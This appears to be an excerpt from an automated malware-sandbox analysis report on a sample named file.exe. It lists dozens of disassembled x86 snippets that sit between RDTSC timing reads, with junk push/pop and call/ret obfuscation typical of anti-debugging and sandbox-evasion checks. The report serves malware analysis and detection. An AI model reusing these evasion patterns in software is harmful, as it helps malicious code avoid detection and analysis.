                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDF0B second address: 9DDF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F0C44E7DD6Eh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 js 00007F0C44E7DD6Eh 0x00000018 push edi 0x00000019 jc 00007F0C44E7DD66h 0x0000001f pop edi 0x00000020 pop eax 0x00000021 mov si, di 0x00000024 lea ebx, dword ptr [ebp+1243FAB9h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F0C44E7DD68h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a pop ebx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0B2A second address: 9F0B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0B45 second address: 9F0B52 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0B52 second address: 9F0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F0C44D4E190h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A74 second address: 9D1A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0C44E7DD66h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0C44E7DD6Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1A92 second address: 9D1AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C44D4E186h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F0C44D4E195h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AB5 second address: 9D1AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AC0 second address: 9D1AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AC4 second address: 9D1AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1AC8 second address: 9D1AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0C44D4E186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0C44D4E196h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD33E second address: 9FD352 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0C44E7DD6Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD76A second address: 9FD779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD779 second address: 9FD77E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD8EF second address: 9FD920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F0C44D4E18Dh 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44D4E199h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDA6D second address: 9FDA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDA75 second address: 9FDA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FDD6D second address: 9FDD8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0C44E7DD84h 0x0000000f pushad 0x00000010 ja 00007F0C44E7DD66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE046 second address: 9FE04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE04A second address: 9FE04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE04E second address: 9FE06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E195h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE1D2 second address: 9FE1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE1D8 second address: 9FE1E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE1E2 second address: 9FE1EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44E7DD6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE31C second address: 9FE353 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0C44D4E18Eh 0x00000008 jmp 00007F0C44D4E197h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 jl 00007F0C44D4E186h 0x00000019 pop edi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE353 second address: 9FE359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE4C2 second address: 9FE4F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E192h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F0C44D4E18Ch 0x0000000f jbe 00007F0C44D4E186h 0x00000015 jmp 00007F0C44D4E18Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE4F8 second address: 9FE4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AA6 second address: 9F5AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0C44D4E186h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AB8 second address: 9F5ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5ABD second address: 9F5AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0C44D4E18Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB073 second address: 9CB08D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F0C44E7DD66h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB08D second address: 9CB091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE65F second address: 9FE689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0C44E7DD76h 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FED87 second address: 9FED8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEEFE second address: 9FEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0C44E7DD66h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF0F6 second address: 9FF0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01F6D second address: A01F9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0C44E7DD74h 0x0000000f push ecx 0x00000010 jmp 00007F0C44E7DD6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A076F9 second address: A076FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0783D second address: A0785A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44E7DD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B21B second address: A0B237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0C44D4E197h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B237 second address: A0B246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44E7DD6Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B246 second address: A0B295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F0C44D4E186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F0C44D4E192h 0x00000012 ja 00007F0C44D4E186h 0x00000018 jc 00007F0C44D4E186h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 jmp 00007F0C44D4E193h 0x00000026 jmp 00007F0C44D4E193h 0x0000002b jns 00007F0C44D4E18Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7C3 second address: A0A7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7C7 second address: A0A7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7CB second address: A0A7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44E7DD74h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A7E7 second address: A0A7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AD99 second address: A0ADD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD73h 0x00000009 je 00007F0C44E7DD66h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F0C44E7DD76h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ADD2 second address: A0ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ADD7 second address: A0ADDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B08F second address: A0B0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnc 00007F0C44D4E186h 0x0000000c jmp 00007F0C44D4E199h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE1D second address: A0DE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 4E468E62h 0x0000000e call 00007F0C44E7DD69h 0x00000013 jno 00007F0C44E7DD83h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE5D second address: A0DE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44D4E194h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE76 second address: A0DE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DE7C second address: A0DEA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E193h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEA4 second address: A0DEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEA8 second address: A0DEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEB6 second address: A0DEC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DEC0 second address: A0DEDD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F0C44D4E18Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E038 second address: A0E043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0C44E7DD66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E2FC second address: A0E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E3FD second address: A0E40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E40C second address: A0E41A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E41A second address: A0E429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44E7DD6Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E5A8 second address: A0E5AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EBD6 second address: A0EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EBE4 second address: A0EBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ED69 second address: A0ED6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0ED6D second address: A0ED7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E18Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EF51 second address: A0EF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44E7DD6Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F618 second address: A0F6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F0C44D4E188h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 xor dword ptr [ebp+122D1DF2h], ebx 0x00000026 mov edi, dword ptr [ebp+122D27D5h] 0x0000002c xor si, 2FAEh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F0C44D4E188h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D24CEh], edi 0x00000053 mov dword ptr [ebp+122D2808h], edx 0x00000059 push 00000000h 0x0000005b push eax 0x0000005c or di, 12B6h 0x00000061 pop esi 0x00000062 xchg eax, ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F0C44D4E199h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F6A7 second address: A0F6CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0C44E7DD66h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F0C44E7DD75h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11C0E second address: A11C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1270F second address: A12734 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD73h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44E7DD6Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12404 second address: A1240E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A132B3 second address: A132B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12F8C second address: A12F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13D28 second address: A13D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14884 second address: A1488A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1488A second address: A1492C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0C44E7DD70h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0C44E7DD68h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, 3CA0FB74h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F0C44E7DD68h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F0C44E7DD68h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F0C44E7DD72h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1492C second address: A14932 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A14932 second address: A14949 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44E7DD6Ch 0x00000008 jc 00007F0C44E7DD66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A151C0 second address: A151DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E196h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A151DA second address: A151F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44E7DD68h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F0C44E7DD74h 0x00000013 pushad 0x00000014 jc 00007F0C44E7DD66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DAB2 second address: A0DB3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jc 00007F0C44D4E18Ch 0x00000010 add edi, 63BD561Dh 0x00000016 lea eax, dword ptr [ebp+1246E53Fh] 0x0000001c mov dword ptr [ebp+122D1E8Ch], ecx 0x00000022 nop 0x00000023 jmp 00007F0C44D4E18Ah 0x00000028 push eax 0x00000029 jbe 00007F0C44D4E18Ah 0x0000002f nop 0x00000030 mov dword ptr [ebp+122D37BCh], esi 0x00000036 lea eax, dword ptr [ebp+1246E4FBh] 0x0000003c xor dword ptr [ebp+122D1D21h], edi 0x00000042 nop 0x00000043 jno 00007F0C44D4E19Bh 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F0C44D4E193h 0x00000051 rdtsc
